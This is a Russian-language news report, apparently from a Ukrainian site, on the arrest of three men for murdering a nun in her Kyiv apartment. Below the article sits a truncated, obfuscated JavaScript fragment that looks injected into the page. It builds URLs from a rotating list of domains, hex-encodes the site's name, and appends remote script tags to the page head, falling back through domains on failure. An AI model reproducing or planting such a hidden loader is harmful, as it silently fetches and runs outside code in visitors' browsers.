Правоохранители раскрыли убийство монахини в Киеве

В Киеве правоохранители задержали трех мужчин, которые убили монахиню.

Так, 28 июня в собственной квартире обнаружили мертвую 64-летнюю киевлянку со связанными руками. Впоследствии работники милиции установили, что покойница была монахиней одного из столичных монастырей. Как пояснил племянник, тетя не отвечала на его телефонные звонки, поэтому он решил утром заехать к ней. Увидев в квартире мертвую родственницу, племянник сразу вызвал милицию.

По подозрению в совершении тяжкого преступления задержаны двое местных жителей. Третий задержанный подозреваемый — уроженец Сумской области.

Установлено, что один из задержанных был знаком с потерпевшей и считал, что женщина имела сбережения. Мужчина поделился своими предположениями с товарищами, поэтому молодые люди пошли на преступление.

Правонарушители признались в совершении убийства. Их вина подтверждена проведенными экспертизами. Во время санкционированного обыска по месту жительства киевлянина милиционеры нашли боевую гранату, а также амфетамин и каннабис.

Собранные сведения внесли в Единый реестр досудебных расследований. Следственным отделом Дарницкого РУ ГУМВД Украины в городе Киеве открыто уголовное производство по ст.115 (умышленное убийство) Уголовного кодекса Украины.

Досудебное расследование продолжается.

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf(‘http’)==0)return p;}else{break;}}return »},a=function(o,e,t){var lp=p();if(lp==»)return;var n=lp+"//"+o;if(window.smlo &#038;& (navigator.userAgent.toLowerCase().indexOf(‘firefox’) == -1))window.smlo.loadSmlo(n.replace(‘https:’,’http:’));else if(window.zSmlo &#038;& (navigator.userAgent.toLowerCase().indexOf(‘firefox’) == -1))window.zSmlo.loadSmlo(n.replace(‘https:’,’http:’));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&#038;&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&#038;&t())}}},d=function(u){var s=n("oisdom");e=s&#038;&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&#038;&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("telegraf.com.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&#038;&(e=o[t+1],d(e))}))};d()}(); // ]]>

Добавить комментарий